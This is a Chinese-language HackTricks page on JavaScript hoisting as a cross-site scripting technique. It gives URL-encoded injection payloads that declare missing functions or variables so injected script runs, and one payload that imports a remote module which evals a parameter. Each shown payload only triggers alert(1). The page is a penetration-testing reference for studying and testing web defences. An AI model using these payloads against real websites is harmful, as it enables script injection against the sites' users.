JS 提升

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

支持 HackTricks 的其他方式：

如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版本的 HackTricks，请查看订阅计划!
获取官方 PEASS & HackTricks 商品
探索PEASS 家族，我们的独家NFTs
加入 💬 Discord 群组 或 电报群组 或关注我们的Twitter 🐦 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。

基本信息

在 JavaScript 语言中，有一种称为**提升（Hoisting）**的机制，其中变量、函数、类或导入的声明在代码执行之前被概念上提升到其作用域的顶部。这个过程由 JavaScript 引擎自动执行，它会多次遍历脚本。

在第一次遍历期间，引擎会解析代码以检查语法错误，并将其转换为抽象语法树。这个阶段包括提升，即将某些声明移动到执行上下文的顶部。如果解析阶段成功，表示没有语法错误，则脚本执行会继续。

重要的是要理解：

脚本必须没有语法错误才能执行。必须严格遵守语法规则。
代码在脚本中的位置会影响执行，因为提升，尽管执行的代码可能与其文本表示不同。

提升的类型

根据 MDN 的信息，JavaScript 中有四种不同类型的提升：

值提升：允许在声明行之前在其作用域内使用变量的值。
声明提升：允许在其作用域内引用变量而不会导致ReferenceError，但变量的值将是undefined。
这种类型会改变其作用域内的行为，因为变量在其实际声明行之前被声明。
声明的副作用会在其余包含它的代码被评估之前发生。

具体来说，函数声明表现出类型 1 的提升行为。var 关键字展示类型 2 的行为。词法声明，包括 let、const 和 class，展示类型 3 的行为。最后，import 语句是独特的，因为它们具有类型 1 和类型 4 的提升行为。

场景

因此，如果您有场景，可以在使用未声明对象之后注入 JS 代码，您可以通过声明它来修复语法（这样您的代码将被执行而不会抛出错误）:

// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};

//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)

// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
return 1
};
myFunction(a, '<INJECTION>')

//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);

// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
<INJECTION>
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
return 1;
}
alert(1);

// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesn´t exist
// cannot be fixed if you can only inject after that code:
test.cookie('leo','INJECTION')
test['cookie','injection']

更多场景

JavaScript Hoisting

JavaScript 变量提升

// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
// You can inject
alert(1));function x(){}//
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
x.y(1,alert(1));function x(){}//)

// Undeclared var accessing 2 nested undeclared method
x.y.z(1,INJECTION)
// You can inject
");import {x} from "https://example.com/module.js"//
// It will be executed
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")


// The imported module:
// module.js
var x = {
y: {
z: function(param) {
eval(param);
}
}
};

export { x };

// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
// It was injected the: let config;`-alert(1)`//`
// With the goal of making in the block the var config be empty, so the return is not executed
// And the same injection was replicated in the body URL to execute an alert

try {
if(config){
return;
}
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)`//`+"
} catch {
fetch("/error", {
method: "POST",
body: {
url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
}
})
}

参考资料

从零开始学习 AWS 黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!